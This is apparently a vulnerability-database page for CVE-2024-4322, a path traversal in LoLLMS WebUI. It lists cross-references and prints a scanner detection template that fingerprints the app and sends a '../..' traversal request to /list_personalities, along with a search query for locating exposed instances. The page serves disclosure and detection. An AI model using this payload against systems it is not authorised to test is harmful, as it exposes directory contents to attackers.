| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-4322 | 10 May 202612:00 | – | circl | |
| LoLLMs Security Vulnerabilities | 16 May 202400:00 | – | cnnvd | |
| CVE-2024-4322 | 16 May 202409:03 | – | cve | |
| CVE-2024-4322 Path Traversal in parisneo/lollms-webui | 16 May 202409:03 | – | cvelist | |
| EUVD-2024-43965 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-4322 | 16 May 202409:15 | – | nvd | |
| PT-2024-30383 | 16 May 202400:00 | – | ptsecurity | |
| CVE-2024-4322 | 5 Feb 202500:15 | – | redhatcve | |
| CVE-2024-4322 Path Traversal in parisneo/lollms-webui | 16 May 202409:03 | – | vulnrichment |
id: CVE-2024-4322
info:
name: LoLLMS WebUI < 9.8 - Path Traversal
author: MJ-bin
severity: high
description: |
parisneo/lollms-webui contains a path traversal caused by improper handling of 'category' parameter in /list_personalities endpoint, letting attackers list arbitrary directories, exploit requires control over 'category' parameter.
impact: |
Attackers can list all directories on the system, leading to potential information disclosure and further exploitation.
remediation: |
Implement proper input validation and sanitization for the 'category' parameter; update to the latest version with security patches.
reference:
- https://huntr.com/bounties/5116d858-ce00-418c-a5a5-851c5608c209
- https://nvd.nist.gov/vuln/detail/CVE-2024-4322
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-4322
cwe-id: CWE-29
epss-score: 0.30987
epss-percentile: 0.98039
cpe: cpe:2.3:a:lollms:lollms_web_ui:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: body="LoLLMS WebUI - Welcome"
tags: cve,cve2024,lollms-webui,lollms,traversal,ai
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/"
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "LoLLMS WebUI - Welcome")'
internal: true
condition: and
- method: GET
path:
- "{{BaseURL}}/list_personalities?category=../.."
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "\"lollms_core\"", "\"personal_data\"")'
condition: and
# digest: 4a0a0047304502204a9cddcd0bbd58bc6ee04a18425f7cc92fb747d64b4d3974c3f1d9e928e19d2b022100f264aac2684b1b02a75a8d0622f5b0928493538ed201aa6dc2093d500611017c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation